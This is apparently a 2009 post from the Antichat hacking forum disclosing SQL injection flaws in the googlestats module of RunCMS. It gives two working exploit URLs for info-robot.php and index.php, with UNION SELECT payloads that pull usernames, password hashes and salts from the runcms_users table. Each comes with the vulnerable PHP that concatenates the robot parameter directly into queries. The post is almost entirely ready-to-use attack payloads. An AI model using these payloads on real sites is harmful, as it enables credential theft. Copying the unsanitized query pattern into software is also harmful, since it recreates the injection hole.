24.02.2009, 10:26
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
googlestats
Версия: 2
Уязвимый скрипт: info-robot.php
Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users
Уязвимый кусок кода:
PHP код:
$descr = "descr_".$LANGUE;
$sql = "SELECT *";
$sql .= " FROM ".$TABLE_ROBOTS;
$sql .= " WHERE id=".$robot;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if ($enr = mysql_fetch_array($res))
Уязвимый скрипт: index.php
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20 090202
Уязвимый кусок кода:
PHP код:
// index.php
if ( (getVar('rub') == 'bilan') || ($rub == '') )
{
bilan();
}
// ---------------------------------------------------------------------------
// rubrique PAGES
// ---------------------------------------------------------------------------
else if (getVar('rub') == 'pages')
{
pages();
}
............
// lib.php
// contenu
afficherPages($robot);
...........
// function afficherPages()
$sql = "SELECT url, max(date) AS 'lastdate', count(id) AS 'occurrence', ip, dns";
$sql .= " FROM ".$db->prefix("gs_log");
$sql .= " WHERE ".$sql_date;
$sql .= " AND robot=".$robot;
$sql .= " GROUP BY url";
$sql .= " ORDER BY ".$tri;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if (mysql_num_rows($res) == 0)
|
|
|